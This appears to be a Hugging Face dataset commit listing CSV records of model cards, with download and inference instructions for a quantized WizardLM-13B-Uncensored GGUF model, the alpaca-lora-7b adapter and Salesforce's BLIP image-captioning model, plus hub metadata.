- **Step 1**: Under Download Model, you can enter the model repo: cognitivecomputations-WizardLM-13B-Uncensored-GGUF-smashed and below it, a specific filename to download, such as: WizardLM-13B-Uncensored.IQ3_M.gguf.
- **Step 2**: Then click Download.

- **Option B** - Downloading on the command line (including multiple files at once):
- **Step 1**: We recommend using the `huggingface-hub` Python library:
```shell
pip3 install huggingface-hub
```
- **Step 2**: Then you can download any individual model file to the current directory, at high speed, with a command like this:
```shell
huggingface-cli download cognitivecomputations-WizardLM-13B-Uncensored-GGUF-smashed WizardLM-13B-Uncensored.IQ3_M.gguf --local-dir . --local-dir-use-symlinks False
```
<details>
<summary>More advanced huggingface-cli download usage (click to read)</summary>
Alternatively, you can also download multiple files at once with a pattern:

```shell
huggingface-cli download cognitivecomputations-WizardLM-13B-Uncensored-GGUF-smashed --local-dir . --local-dir-use-symlinks False --include='*Q4_K*gguf'
```

For more documentation on downloading with `huggingface-cli`, please see: [HF -> Hub Python Library -> Download files -> Download from the CLI](https://huggingface.co/docs/huggingface_hub/guides/download#download-from-the-cli).

To accelerate downloads on fast connections (1Gbit/s or higher), install `hf_transfer`:

```shell
pip3 install hf_transfer
```

And set the environment variable `HF_HUB_ENABLE_HF_TRANSFER` to `1`:

```shell
HF_HUB_ENABLE_HF_TRANSFER=1 huggingface-cli download cognitivecomputations-WizardLM-13B-Uncensored-GGUF-smashed WizardLM-13B-Uncensored.IQ3_M.gguf --local-dir . --local-dir-use-symlinks False
```

Windows Command Line users: You can set the environment variable by running `set HF_HUB_ENABLE_HF_TRANSFER=1` before the download command.
</details>
<!-- README_GGUF.md-how-to-download end -->

<!-- README_GGUF.md-how-to-run start -->

## How to run the model in GGUF format?
- **Option A** - Introductory example with the `llama.cpp` command

Make sure you are using `llama.cpp` from commit [d0cee0d](https://github.com/ggerganov/llama.cpp/commit/d0cee0d36d5be95a0d9088b674dbb27354107221) or later.

```shell
./main -ngl 35 -m WizardLM-13B-Uncensored.IQ3_M.gguf --color -c 32768 --temp 0.7 --repeat_penalty 1.1 -n -1 -p ""<s>[INST] {prompt} [/INST]""
```

Change `-ngl 35` to the number of layers to offload to GPU. Remove it if you don't have GPU acceleration.

Change `-c 32768` to the desired sequence length. For extended sequence models - eg 8K, 16K, 32K - the necessary RoPE scaling parameters are read from the GGUF file and set by llama.cpp automatically. Note that longer sequence lengths require much more resources, so you may need to reduce this value.

If you want to have a chat-style conversation, replace the `-p <PROMPT>` argument with `-i -ins`.

For other parameters and how to use them, please refer to [the llama.cpp documentation](https://github.com/ggerganov/llama.cpp/blob/master/examples/main/README.md).

- **Option B** - Running in `text-generation-webui`

Further instructions can be found in the text-generation-webui documentation, here: [text-generation-webui/docs/04 ‐ Model Tab.md](https://github.com/oobabooga/text-generation-webui/blob/main/docs/04%20-%20Model%20Tab.md#llamacpp).

- **Option C** - Running from Python code

You can use GGUF models from Python using the [llama-cpp-python](https://github.com/abetlen/llama-cpp-python) or [ctransformers](https://github.com/marella/ctransformers) libraries. Note that at the time of writing (Nov 27th 2023), ctransformers has not been updated for some time and is not compatible with some recent models. Therefore I recommend you use llama-cpp-python.

### How to load this model in Python code, using llama-cpp-python

For full documentation, please see: [llama-cpp-python docs](https://abetlen.github.io/llama-cpp-python/).

#### First install the package

Run one of the following commands, according to your system:

```shell
# Base llama-cpp-python with no GPU acceleration
pip install llama-cpp-python
# With NVidia CUDA acceleration
CMAKE_ARGS=""-DLLAMA_CUBLAS=on"" pip install llama-cpp-python
# Or with OpenBLAS acceleration
CMAKE_ARGS=""-DLLAMA_BLAS=ON -DLLAMA_BLAS_VENDOR=OpenBLAS"" pip install llama-cpp-python
# Or with CLBLast acceleration
CMAKE_ARGS=""-DLLAMA_CLBLAST=on"" pip install llama-cpp-python
# Or with AMD ROCm GPU acceleration (Linux only)
CMAKE_ARGS=""-DLLAMA_HIPBLAS=on"" pip install llama-cpp-python
# Or with Metal GPU acceleration for macOS systems only
CMAKE_ARGS=""-DLLAMA_METAL=on"" pip install llama-cpp-python

# On Windows, to set the CMAKE_ARGS variable in PowerShell, follow this format; eg for NVidia CUDA:
$env:CMAKE_ARGS = ""-DLLAMA_CUBLAS=on""
pip install llama-cpp-python
```

#### Simple llama-cpp-python example code

```python
from llama_cpp import Llama

# Set n_gpu_layers to the number of layers to offload to GPU. Set to 0 if no GPU acceleration is available on your system.
llm = Llama(
  model_path=""./WizardLM-13B-Uncensored.IQ3_M.gguf"",  # Download the model file first
  n_ctx=32768,  # The max sequence length to use - note that longer sequence lengths require much more resources
  n_threads=8,  # The number of CPU threads to use, tailor to your system and the resulting performance
  n_gpu_layers=35  # The number of layers to offload to GPU, if you have GPU acceleration available
)

# Simple inference example
output = llm(
  ""<s>[INST] {prompt} [/INST]"",  # Prompt
  max_tokens=512,  # Generate up to 512 tokens
  stop=[""</s>""],  # Example stop token - not necessarily correct for this specific model! Please check before using.
  echo=True  # Whether to echo the prompt
)

# Chat Completion API

llm = Llama(model_path=""./WizardLM-13B-Uncensored.IQ3_M.gguf"", chat_format=""llama-2"")  # Set chat_format according to the model you are using
llm.create_chat_completion(
    messages = [
        {""role"": ""system"", ""content"": ""You are a story writing assistant.""},
        {
            ""role"": ""user"",
            ""content"": ""Write a story about llamas.""
        }
    ]
)
```

- **Option D** - Running with LangChain

Here are guides on using llama-cpp-python and ctransformers with LangChain:

* [LangChain + llama-cpp-python](https://python.langchain.com/docs/integrations/llms/llamacpp)
* [LangChain + ctransformers](https://python.langchain.com/docs/integrations/providers/ctransformers)

## Configurations

The configuration info is in `smash_config.json`.

## Credits & License

The license of the smashed model follows the license of the original model. Please check the license of the original model, which provided the base model, before using this model. The license of the `pruna-engine` is [here](https://pypi.org/project/pruna-engine/) on PyPI.

## Want to compress other models?

- Contact us and tell us which model to compress next [here](https://www.pruna.ai/contact).
- Request access to easily compress your own AI models [here](https://z0halsaff74.typeform.com/pruna-access?typeform-source=www.pruna.ai).","{""id"": ""PrunaAI/cognitivecomputations-WizardLM-13B-Uncensored-GGUF-smashed"", ""author"": ""PrunaAI"", ""sha"": ""4c1a13337dd99ac4e5b642feda7f2a253f8a4128"", ""last_modified"": ""2025-02-18 23:08:25+00:00"", ""created_at"": ""2025-02-18 23:08:24+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 0, ""downloads_all_time"": null, ""likes"": 0, ""library_name"": null, ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""pruna-ai"", ""base_model:cognitivecomputations/WizardLM-13B-Uncensored"", ""base_model:finetune:cognitivecomputations/WizardLM-13B-Uncensored"", ""region:us""], ""pipeline_tag"": null, ""mask_token"": null, ""trending_score"": null, ""card_data"": ""base_model: cognitivecomputations/WizardLM-13B-Uncensored\nmetrics:\n- memory_disk\n- memory_inference\n- inference_latency\n- inference_throughput\n- inference_CO2_emissions\n- inference_energy_consumption\ntags:\n- pruna-ai\nthumbnail: https://assets-global.website-files.com/646b351987a8d8ce158d1940/64ec9e96b4334c0e1ac41504_Logo%20with%20white%20text.svg"", ""widget_data"": null, ""model_index"": null, ""config"": null, ""transformers_info"": null, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)""], ""spaces"": [], ""safetensors"": null, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2025-02-18 23:08:25+00:00"", ""cardData"": ""base_model: cognitivecomputations/WizardLM-13B-Uncensored\nmetrics:\n- memory_disk\n- memory_inference\n- inference_latency\n- inference_throughput\n- inference_CO2_emissions\n- inference_energy_consumption\ntags:\n- pruna-ai\nthumbnail: https://assets-global.website-files.com/646b351987a8d8ce158d1940/64ec9e96b4334c0e1ac41504_Logo%20with%20white%20text.svg"", ""transformersInfo"": null, ""_id"": ""67b512e8f703732d150e370b"", ""modelId"": ""PrunaAI/cognitivecomputations-WizardLM-13B-Uncensored-GGUF-smashed"", ""usedStorage"": 0}",1,,0,,0,,0,,0,huggingface/InferenceSupport/discussions/new?title=PrunaAI/cognitivecomputations-WizardLM-13B-Uncensored-GGUF-smashed&description=React%20to%20this%20comment%20with%20an%20emoji%20to%20vote%20for%20%5BPrunaAI%2Fcognitivecomputations-WizardLM-13B-Uncensored-GGUF-smashed%5D(%2FPrunaAI%2Fcognitivecomputations-WizardLM-13B-Uncensored-GGUF-smashed)%20to%20be%20supported%20by%20Inference%20Providers.%0A%0A(optional)%20Which%20providers%20are%20you%20interested%20in%3F%20(Novita%2C%20Hyperbolic%2C%20Together%E2%80%A6)%0A,1
WizardLM-2-8x22B_finetunes_20250426_014322.csv_finetunes_20250426_014322.csv
ADDED
The diff for this file is too large to render.
See raw diff
XTTS-v2_finetunes_20250424_150612.csv_finetunes_20250424_150612.csv
ADDED
The diff for this file is too large to render.
See raw diff
all-MiniLM-L12-v2_finetunes_20250426_171734.csv_finetunes_20250426_171734.csv
ADDED
The diff for this file is too large to render.
See raw diff
alpaca-lora-7b_finetunes_20250425_165642.csv_finetunes_20250425_165642.csv
ADDED
@@ -0,0 +1,34 @@
model_id,card,metadata,depth,children,children_count,adapters,adapters_count,quantized,quantized_count,merges,merges_count,spaces,spaces_count
tloen/alpaca-lora-7b,"---
license: mit
datasets:
- yahma/alpaca-cleaned
---

This repo contains a low-rank adapter for LLaMA-7B, fit on the [Stanford Alpaca](https://github.com/tatsu-lab/stanford_alpaca) dataset.

This version of the weights was trained with the following hyperparameters:

- Epochs: 10 (load from best epoch)
- Batch size: 128
- Cutoff length: 512
- Learning rate: 3e-4
- LoRA _r_: 16
- LoRA target modules: q_proj, k_proj, v_proj, o_proj

That is:

```
python finetune.py \
    --base_model='decapoda-research/llama-7b-hf' \
    --num_epochs=10 \
    --cutoff_len=512 \
    --group_by_length \
    --output_dir='./lora-alpaca-512-qkvo' \
    --lora_target_modules='[q_proj,k_proj,v_proj,o_proj]' \
    --lora_r=16 \
    --micro_batch_size=8
```
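
To actually attach this adapter in your own code, a minimal PEFT sketch along the following lines should work; the base-model name mirrors the command above, and `peft`/`transformers` are assumed installed:

```python
import torch
from peft import PeftModel
from transformers import AutoModelForCausalLM, AutoTokenizer

# Attach the LoRA adapter to the LLaMA-7B base model.
base = ""decapoda-research/llama-7b-hf""  # base model from the command above
model = AutoModelForCausalLM.from_pretrained(base, torch_dtype=torch.float16)
model = PeftModel.from_pretrained(model, ""tloen/alpaca-lora-7b"")  # this adapter
tokenizer = AutoTokenizer.from_pretrained(base)

prompt = ""### Instruction:\nName three common shell built-ins.\n\n### Response:\n""
inputs = tokenizer(prompt, return_tensors=""pt"")
print(tokenizer.decode(model.generate(**inputs, max_new_tokens=64)[0]))
```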
Instructions for running it can be found at https://github.com/tloen/alpaca-lora.","{""id"": ""tloen/alpaca-lora-7b"", ""author"": ""tloen"", ""sha"": ""12103d6baae1b320aa60631b38acb6ea094a0539"", ""last_modified"": ""2023-04-04 16:39:14+00:00"", ""created_at"": ""2023-03-14 00:10:54+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 0, ""downloads_all_time"": null, ""likes"": 445, ""library_name"": null, ""gguf"": null, ""inference"": null, ""inference_provider_mapping"": null, ""tags"": [""dataset:yahma/alpaca-cleaned"", ""license:mit"", ""region:us""], ""pipeline_tag"": null, ""mask_token"": null, ""trending_score"": null, ""card_data"": ""datasets:\n- yahma/alpaca-cleaned\nlicense: mit"", ""widget_data"": null, ""model_index"": null, ""config"": null, ""transformers_info"": null, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='adapter_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='adapter_model.bin', size=None, blob_id=None, lfs=None)""], ""spaces"": [""tloen/alpaca-lora"", ""chansung/LLM-As-Chatbot"", ""fl399/deplot_plus_llm"", ""rewoo/ReWOO-Demo"", ""zetavg/LLaMA-LoRA-Tuner-UI-Demo"", ""drift-ai/faq-website"", ""DESUCLUB/BLLAMA"", ""Kevin676/Alpaca-LoRA-with-Voice-Cloning"", ""Illumotion/Koboldcpp"", ""mustapha/chatAlpaca"", ""NeuralInternet/Alpaca-LoRA-Serve"", ""AnonymousSub/Ayurveda4U"", ""Canstralian/WizardLM-1.6"", ""winglian/llama-adapter"", ""cnrai/alpaca-30b-app"", ""Msp/deplot_plus_llm"", ""edson31415/alpaca-lora-7b-test"", ""darpan-jain/llm-chat"", ""ShahrukhYousafzai/Alpaca-Lora"", ""russellsparadox/project0"", ""sagu7/alpaca-lora"", ""hitsense/sense_faq"", ""mazafard/freefeed.me"", ""Ordenador/alpaca-lora"", ""shivanshsyal3/alpaca"", ""shivanshsyal3/alpaca2"", ""JohnTan38/Alpaca-LoRA-Serve"", ""sorokinvld/alpaca-lora"", ""NeuralInternet/Alpaca-LoRA"", ""esmat/Alpaca-LoRA-Serve"", ""Fan21/a"", ""4nd3r50n/alpaca-lora"", ""sinkaroid/alpaca-lora"", ""sinkaroid/EleutherAI-gpt-j-6b"", ""peter-v/faq-website"", ""victorrodrigues20/Alpaca-LoRA-Serve"", ""sepehr09/alpaca-lora"", ""kristada673/WizardCoder"", ""faisalhr1997/Koboldcpp"", ""freQuensy23/ru-openllama-space"", ""ganfanghao/model"", ""AIProdAndInnov/ReWOO-Demo"", ""brandonmai/duhoc-rewoo-agent"", ""sakshi7502/SVFT_PEFT""], ""safetensors"": null, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2023-04-04 16:39:14+00:00"", ""cardData"": ""datasets:\n- yahma/alpaca-cleaned\nlicense: mit"", ""transformersInfo"": null, ""_id"": ""640fbb8e56a3dda8aed24ffb"", ""modelId"": ""tloen/alpaca-lora-7b"", ""usedStorage"": 151362075}",0,,0,,0,,0,,0,"AIProdAndInnov/ReWOO-Demo, Canstralian/WizardLM-1.6, DESUCLUB/BLLAMA, Illumotion/Koboldcpp, Kevin676/Alpaca-LoRA-with-Voice-Cloning, chansung/LLM-As-Chatbot, drift-ai/faq-website, fl399/deplot_plus_llm, huggingface/InferenceSupport/discussions/new?title=tloen/alpaca-lora-7b&description=React%20to%20this%20comment%20with%20an%20emoji%20to%20vote%20for%20%5Btloen%2Falpaca-lora-7b%5D(%2Ftloen%2Falpaca-lora-7b)%20to%20be%20supported%20by%20Inference%20Providers.%0A%0A(optional)%20Which%20providers%20are%20you%20interested%20in%3F%20(Novita%2C%20Hyperbolic%2C%20Together%E2%80%A6)%0A, mustapha/chatAlpaca, rewoo/ReWOO-Demo, tloen/alpaca-lora, zetavg/LLaMA-LoRA-Tuner-UI-Demo",13
|
blip-image-captioning-large_finetunes_20250424_223250.csv_finetunes_20250424_223250.csv
ADDED
|
@@ -0,0 +1,1130 @@
| 1 |
+
model_id,card,metadata,depth,children,children_count,adapters,adapters_count,quantized,quantized_count,merges,merges_count,spaces,spaces_count
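
As a reading aid (not part of the uploaded data), one way to load a CSV of this shape with pandas; the file name is taken from this commit and the selected columns come from the header row above.

```python
# Sketch: loading one of the finetune CSVs from this commit with pandas.
import pandas as pd

df = pd.read_csv("blip-image-captioning-large_finetunes_20250424_223250.csv_finetunes_20250424_223250.csv")
# Each row is one model: its id, raw model card, hub metadata, and derived counts.
print(df[["model_id", "children_count", "adapters_count", "spaces_count"]].head())
```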
|
| 2 |
+
Salesforce/blip-image-captioning-large,"---
|
| 3 |
+
pipeline_tag: image-to-text
|
| 4 |
+
tags:
|
| 5 |
+
- image-captioning
|
| 6 |
+
languages:
|
| 7 |
+
- en
|
| 8 |
+
license: bsd-3-clause
|
| 9 |
+
---
|
| 10 |
+
|
| 11 |
+
# BLIP: Bootstrapping Language-Image Pre-training for Unified Vision-Language Understanding and Generation
|
| 12 |
+
|
| 13 |
+
Model card for image captioning pretrained on the COCO dataset - large architecture (with ViT large backbone).
|
| 14 |
+
|
| 15 |
+
[Figure omitted: BLIP overview figure, pulled from the official repo. Image source: https://github.com/salesforce/BLIP]
|
| 18 |
+
|
| 19 |
+
## TL;DR
|
| 20 |
+
|
| 21 |
+
The authors of the [paper](https://arxiv.org/abs/2201.12086) write in the abstract:
|
| 22 |
+
|
| 23 |
+
*Vision-Language Pre-training (VLP) has advanced the performance for many vision-language tasks. However, most existing pre-trained models only excel in either understanding-based tasks or generation-based tasks. Furthermore, performance improvement has been largely achieved by scaling up the dataset with noisy image-text pairs collected from the web, which is a suboptimal source of supervision. In this paper, we propose BLIP, a new VLP framework which transfers flexibly to both vision-language understanding and generation tasks. BLIP effectively utilizes the noisy web data by bootstrapping the captions, where a captioner generates synthetic captions and a filter removes the noisy ones. We achieve state-of-the-art results on a wide range of vision-language tasks, such as image-text retrieval (+2.7% in average recall@1), image captioning (+2.8% in CIDEr), and VQA (+1.6% in VQA score). BLIP also demonstrates strong generalization ability when directly transferred to video-language tasks in a zero-shot manner. Code, models, and datasets are released.*
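
To make the bootstrapping idea concrete, here is a hedged pseudocode sketch (not from the paper or this card); `captioner` and `filter_model` are hypothetical stand-ins for the two modules the abstract describes.

```python
# Illustrative-only sketch of the CapFilt bootstrapping loop described above.
# captioner and filter_model are hypothetical stand-ins, not real APIs.
def bootstrap_captions(web_pairs, captioner, filter_model):
    clean_pairs = []
    for image, web_caption in web_pairs:
        synthetic_caption = captioner.generate(image)      # captioner proposes a synthetic caption
        for caption in (web_caption, synthetic_caption):
            if filter_model.is_aligned(image, caption):    # filter drops noisy image-text pairs
                clean_pairs.append((image, caption))
    return clean_pairs
```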
|
| 24 |
+
|
| 25 |
+
## Usage
|
| 26 |
+
|
| 27 |
+
You can use this model for conditional and unconditional image captioning.
|
| 28 |
+
|
| 29 |
+
### Using the Pytorch model
|
| 30 |
+
|
| 31 |
+
#### Running the model on CPU
|
| 32 |
+
|
| 33 |
+
<details>
|
| 34 |
+
<summary> Click to expand </summary>
|
| 35 |
+
|
| 36 |
+
```python
|
| 37 |
+
import requests
|
| 38 |
+
from PIL import Image
|
| 39 |
+
from transformers import BlipProcessor, BlipForConditionalGeneration
|
| 40 |
+
|
| 41 |
+
processor = BlipProcessor.from_pretrained(""Salesforce/blip-image-captioning-large"")
|
| 42 |
+
model = BlipForConditionalGeneration.from_pretrained(""Salesforce/blip-image-captioning-large"")
|
| 43 |
+
|
| 44 |
+
img_url = 'https://storage.googleapis.com/sfr-vision-language-research/BLIP/demo.jpg'
|
| 45 |
+
raw_image = Image.open(requests.get(img_url, stream=True).raw).convert('RGB')
|
| 46 |
+
|
| 47 |
+
# conditional image captioning
|
| 48 |
+
text = ""a photography of""
|
| 49 |
+
inputs = processor(raw_image, text, return_tensors=""pt"")
|
| 50 |
+
|
| 51 |
+
out = model.generate(**inputs)
|
| 52 |
+
print(processor.decode(out[0], skip_special_tokens=True))
|
| 53 |
+
|
| 54 |
+
# unconditional image captioning
|
| 55 |
+
inputs = processor(raw_image, return_tensors=""pt"")
|
| 56 |
+
|
| 57 |
+
out = model.generate(**inputs)
|
| 58 |
+
print(processor.decode(out[0], skip_special_tokens=True))
|
| 59 |
+
```
|
| 60 |
+
</details>
|
| 61 |
+
|
| 62 |
+
#### Running the model on GPU
|
| 63 |
+
|
| 64 |
+
##### In full precision
|
| 65 |
+
|
| 66 |
+
<details>
|
| 67 |
+
<summary> Click to expand </summary>
|
| 68 |
+
|
| 69 |
+
```python
|
| 70 |
+
import requests
|
| 71 |
+
from PIL import Image
|
| 72 |
+
from transformers import BlipProcessor, BlipForConditionalGeneration
|
| 73 |
+
|
| 74 |
+
processor = BlipProcessor.from_pretrained(""Salesforce/blip-image-captioning-large"")
|
| 75 |
+
model = BlipForConditionalGeneration.from_pretrained(""Salesforce/blip-image-captioning-large"").to(""cuda"")
|
| 76 |
+
|
| 77 |
+
img_url = 'https://storage.googleapis.com/sfr-vision-language-research/BLIP/demo.jpg'
|
| 78 |
+
raw_image = Image.open(requests.get(img_url, stream=True).raw).convert('RGB')
|
| 79 |
+
|
| 80 |
+
# conditional image captioning
|
| 81 |
+
text = ""a photography of""
|
| 82 |
+
inputs = processor(raw_image, text, return_tensors=""pt"").to(""cuda"")
|
| 83 |
+
|
| 84 |
+
out = model.generate(**inputs)
|
| 85 |
+
print(processor.decode(out[0], skip_special_tokens=True))
|
| 86 |
+
|
| 87 |
+
# unconditional image captioning
|
| 88 |
+
inputs = processor(raw_image, return_tensors=""pt"").to(""cuda"")
|
| 89 |
+
|
| 90 |
+
out = model.generate(**inputs)
|
| 91 |
+
print(processor.decode(out[0], skip_special_tokens=True))
|
| 92 |
+
```
|
| 93 |
+
</details>
|
| 94 |
+
|
| 95 |
+
##### In half precision (`float16`)
|
| 96 |
+
|
| 97 |
+
<details>
|
| 98 |
+
<summary> Click to expand </summary>
|
| 99 |
+
|
| 100 |
+
```python
|
| 101 |
+
import torch
|
| 102 |
+
import requests
|
| 103 |
+
from PIL import Image
|
| 104 |
+
from transformers import BlipProcessor, BlipForConditionalGeneration
|
| 105 |
+
|
| 106 |
+
processor = BlipProcessor.from_pretrained(""Salesforce/blip-image-captioning-large"")
|
| 107 |
+
model = BlipForConditionalGeneration.from_pretrained(""Salesforce/blip-image-captioning-large"", torch_dtype=torch.float16).to(""cuda"")
|
| 108 |
+
|
| 109 |
+
img_url = 'https://storage.googleapis.com/sfr-vision-language-research/BLIP/demo.jpg'
|
| 110 |
+
raw_image = Image.open(requests.get(img_url, stream=True).raw).convert('RGB')
|
| 111 |
+
|
| 112 |
+
# conditional image captioning
|
| 113 |
+
text = ""a photography of""
|
| 114 |
+
inputs = processor(raw_image, text, return_tensors=""pt"").to(""cuda"", torch.float16)
|
| 115 |
+
|
| 116 |
+
out = model.generate(**inputs)
|
| 117 |
+
print(processor.decode(out[0], skip_special_tokens=True))
|
| 118 |
+
# >>> a photography of a woman and her dog
|
| 119 |
+
|
| 120 |
+
# unconditional image captioning
|
| 121 |
+
inputs = processor(raw_image, return_tensors=""pt"").to(""cuda"", torch.float16)
|
| 122 |
+
|
| 123 |
+
out = model.generate(**inputs)
|
| 124 |
+
print(processor.decode(out[0], skip_special_tokens=True))
|
| 125 |
+
# >>> a woman sitting on the beach with her dog
|
| 126 |
+
```
|
| 127 |
+
</details>
|
| 128 |
+
|
| 129 |
+
## Ethical Considerations
|
| 130 |
+
This release is for research purposes only in support of an academic paper. Our models, datasets, and code are not specifically designed or evaluated for all downstream purposes. We strongly recommend users evaluate and address potential concerns related to accuracy, safety, and fairness before deploying this model. We encourage users to consider the common limitations of AI, comply with applicable laws, and leverage best practices when selecting use cases, particularly for high-risk scenarios where errors or misuse could significantly impact people’s lives, rights, or safety. For further guidance on use cases, refer to our AUP and AI AUP.
|
| 131 |
+
|
| 132 |
+
## BibTex and citation info
|
| 133 |
+
|
| 134 |
+
```
|
| 135 |
+
@misc{https://doi.org/10.48550/arxiv.2201.12086,
|
| 136 |
+
doi = {10.48550/ARXIV.2201.12086},
|
| 137 |
+
|
| 138 |
+
url = {https://arxiv.org/abs/2201.12086},
|
| 139 |
+
|
| 140 |
+
author = {Li, Junnan and Li, Dongxu and Xiong, Caiming and Hoi, Steven},
|
| 141 |
+
|
| 142 |
+
keywords = {Computer Vision and Pattern Recognition (cs.CV), FOS: Computer and information sciences, FOS: Computer and information sciences},
|
| 143 |
+
|
| 144 |
+
title = {BLIP: Bootstrapping Language-Image Pre-training for Unified Vision-Language Understanding and Generation},
|
| 145 |
+
|
| 146 |
+
publisher = {arXiv},
|
| 147 |
+
|
| 148 |
+
year = {2022},
|
| 149 |
+
|
| 150 |
+
copyright = {Creative Commons Attribution 4.0 International}
|
| 151 |
+
}
|
| 152 |
+
```","{""id"": ""Salesforce/blip-image-captioning-large"", ""author"": ""Salesforce"", ""sha"": ""353689b859fcf0523410b1806dace5fb46ecdf41"", ""last_modified"": ""2025-02-03 06:42:42+00:00"", ""created_at"": ""2022-12-13 11:27:40+00:00"", ""private"": false, ""gated"": false, ""disabled"": false, ""downloads"": 2428198, ""downloads_all_time"": null, ""likes"": 1309, ""library_name"": ""transformers"", ""gguf"": null, ""inference"": ""warm"", ""inference_provider_mapping"": null, ""tags"": [""transformers"", ""pytorch"", ""tf"", ""safetensors"", ""blip"", ""image-text-to-text"", ""image-captioning"", ""image-to-text"", ""arxiv:2201.12086"", ""license:bsd-3-clause"", ""endpoints_compatible"", ""region:us""], ""pipeline_tag"": ""image-to-text"", ""mask_token"": null, ""trending_score"": null, ""card_data"": ""license: bsd-3-clause\npipeline_tag: image-to-text\ntags:\n- image-captioning\nlanguages:\n- en"", ""widget_data"": null, ""model_index"": null, ""config"": {""architectures"": [""BlipForConditionalGeneration""], ""model_type"": ""blip"", ""tokenizer_config"": {""cls_token"": ""[CLS]"", ""mask_token"": ""[MASK]"", ""pad_token"": ""[PAD]"", ""sep_token"": ""[SEP]"", ""unk_token"": ""[UNK]""}}, ""transformers_info"": {""auto_model"": ""AutoModelForImageTextToText"", ""custom_class"": null, ""pipeline_tag"": ""image-text-to-text"", ""processor"": ""AutoProcessor""}, ""siblings"": [""RepoSibling(rfilename='.gitattributes', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='README.md', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='model.safetensors', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='preprocessor_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='pytorch_model.bin', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='special_tokens_map.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tf_model.h5', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='tokenizer_config.json', size=None, blob_id=None, lfs=None)"", ""RepoSibling(rfilename='vocab.txt', size=None, blob_id=None, lfs=None)""], ""spaces"": [""microsoft/HuggingGPT"", ""fffiloni/text-guided-image-colorization"", ""xingpng/CSGO"", ""TencentARC/Caption-Anything"", ""IDEA-Research/Grounded-SAM"", ""haodongli/LucidDreamer"", ""sam-hq-team/sam-hq"", ""TencentARC/BrushEdit"", ""openfree/ColorRevive"", ""tonyassi/blip-image-captioning-large"", ""resul-ai/comparing-captioning-models"", ""linfanluntan/Grounded-SAM"", ""GeorgiosIoannouCoder/cuny-tech-prep-tutorial-1"", ""radames/Candle-BLIP-Image-Captioning"", ""Claudz163/Image-To-Character-Text"", ""hysts/image-captioning-with-blip"", ""ybelkada/blip-image-captioning-space-large"", ""PAIR/StreamingSVD"", ""JournalistsonHF/text-to-image-bias"", ""faisalhr1997/blip-image-captioning-space-large"", ""matanmichaely/image_to_audio_story"", ""taesiri/HuggingGPT-Lite"", ""LuckRafly/Chat-with-an-Image-GeminiAI"", ""mouaddb/image2text-comp"", ""NeurixYUFI/img2txt"", ""gradio-client-demos/comparing-captioning-models"", ""weijiawu/ImageEditAnything"", ""xeonm/image-to-audio-story"", ""Kvikontent/Image2Music"", ""at2507/Img2Text_blip_v1"", ""clem/comparing-captioning-models"", ""jesoteric/Grounded-SAM"", ""techasad/image-to-audio-story"", ""xhk/ASAM"", ""Jangai/Describer"", ""sungyi654/Image_Narration"", ""none-yet/Xylaria"", 
""multimodalart/pix2pix-zero"", ""kasun/git-large"", ""aTrapDeer/Img2TimDillonRant"", ""kviai/your-girl-ai"", ""PeachTechAI/COLLEAGUE-AI"", ""Kvikontent/ChatGPT-Vision"", ""xuyingliKepler/KET"", ""GenAILearniverse/image_captioning"", ""Pontonkid/Image-Audio-Description"", ""beingcognitive/Image_to_Music"", ""Lap1official/Xylaria-chat"", ""dhanushreddy29/comparing-captioning-models"", ""kasun/comparing-captioning-models"", ""spuun/blip-api"", ""kasun/blip-large"", ""ikechan8370/cp-extra"", ""Mediocreatmybest/PipelineImageCaption"", ""manutej/imagedemo1"", ""javeed3030/FreeAI"", ""dreamdrop-art/000555111"", ""jitubutwal1441/image-to-story"", ""Reiner4/extras"", ""ASAM-Team/ASAM"", ""flocolombari/COLOMBARI_VIGNES-FERRINO_DERNIAUX_NIYONKURU"", ""ruslanmv/Image-To-Text"", ""malay-91418/image-info"", ""evijit/text-to-image-bias"", ""HongcanGuo/InspiroV"", ""Primajin/blip-image-captioning-large"", ""VDNT11/Multilingual-Assistive-Model"", ""Lap1official/API"", ""Taizun/Image-captioning"", ""ccarr0807/HuggingGPT"", ""theholycityweb/HuggingGPT"", ""xxx1/VQA_CAP_GPT"", ""Alfasign/HuggingGPT-Lite"", ""Anandx05/image-captioning-mscoco"", ""saurshaz/HuggingGPT"", ""batmac/captioner"", ""redo62/image2text-comp"", ""VIPLab/Caption-Anything"", ""ZhaoYoujia/ImageRecognition"", ""muneebashraf/Visual-Sentiment-Analyzer"", ""santoshNA/Image_caption_description"", ""DQChoi/image_sticker"", ""joaomorossini/image_captioning_model_comparison"", ""keplersj/photo-merge"", ""alecinvan/image-captioning-tts"", ""harizh/rizlore"", ""lingkoai/Salesforce-blip-image-captioning-large"", ""MelodyYuuka/image-captioning-with-blip"", ""Kevin8881038/SillyTavern_extras"", ""Samlund56/blip-image-captioning-large"", ""gasbaoui/Instagram-post-improvement"", ""itskarelleh/alt-text-mage"", ""czwQAQ/extras"", ""Dendup/image_to_story_generation.app"", ""alecinvan/flotationMultiModalRobot"", ""zzzzred/extras"", ""MosaHosseini/Image2story"", ""Slyfox12/img2poem"", ""Anew1007/extras"", ""mixcard/blip-image-captioning-large""], ""safetensors"": {""parameters"": {""I64"": 512, ""F32"": 469732924}, ""total"": 469733436}, ""security_repo_status"": null, ""xet_enabled"": null, ""lastModified"": ""2025-02-03 06:42:42+00:00"", ""cardData"": ""license: 